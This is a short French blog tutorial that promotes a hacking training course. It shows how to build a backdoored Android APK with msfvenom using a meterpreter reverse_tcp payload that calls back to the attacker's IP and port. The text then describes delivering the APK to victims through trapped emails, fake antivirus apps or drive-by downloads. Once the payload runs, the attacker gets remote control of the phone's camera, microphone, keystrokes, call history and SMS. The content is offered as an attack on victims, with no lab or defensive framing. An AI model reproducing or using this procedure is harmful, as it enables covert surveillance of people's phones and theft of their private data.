[Tutorial] Hacking de smartphones Android avec MSFVenom

Aujourd’hui, je vais vous présenter une technique très simple permettant de hacker des smartphones sous Android et ceux en utilisant MSFVenom.

MSFVenom est donc une combinaison entre MSFPayload et MSFEncode ( présent dans les anciennes versions de Metasploit )

Ces outils sont extrêmement utiles pour générer des Payloads dans différents formats, et les encoder ensuite en utilisant différents modules. Combiner ces deux outils en un seul est simplement logique.

Cela standarise  les options de l’outil, plus rapide (instance d’un seul framework), et gère tout type de  formats d’output

 

On va pouvoir générer une APK piégée grâce à la commande suivante :

msfvenom –p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R > /root/Desktop/pentest.apk

  • -p = Payload à utiliser
  • LHOST = Adresse ip locale ( de l’attaquant )
  • LPORT= Port d’écoute
  • R = Format de l’output

 

Ensuite on va envoyer l’APK à notre victime à travers diverses techniques tel qu’un mail piégé par exemple, ou intégré au sein d’une application gratuite, faux antivirus, Drive-By-Download …

On va ensuite lancer notre Listener sur MSFConsole  :

Une fois que la victime  installe l’APK ( nous verrons au niveau des prochains articles comment pouvoir signer l’APK mais aussi mettre en place un système de distribution sophistiqué ) , le Listener va pouvoir récuperer l’accès au smartphone :

Et voilà, vous pouvez commencer votre manipulation , tapez Help pour voir la panoplie de commandes qui s’offrent à vous ( Camera, audio, keylogger, récupération de l’historique des appels, SMS etc..) :

Enjoy 🙂

Ces techniques là sont présentent au niveau de mes formations sur Alphorm.com 🙂 ===> http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-avance

N’attendez plus pour vous formez ^^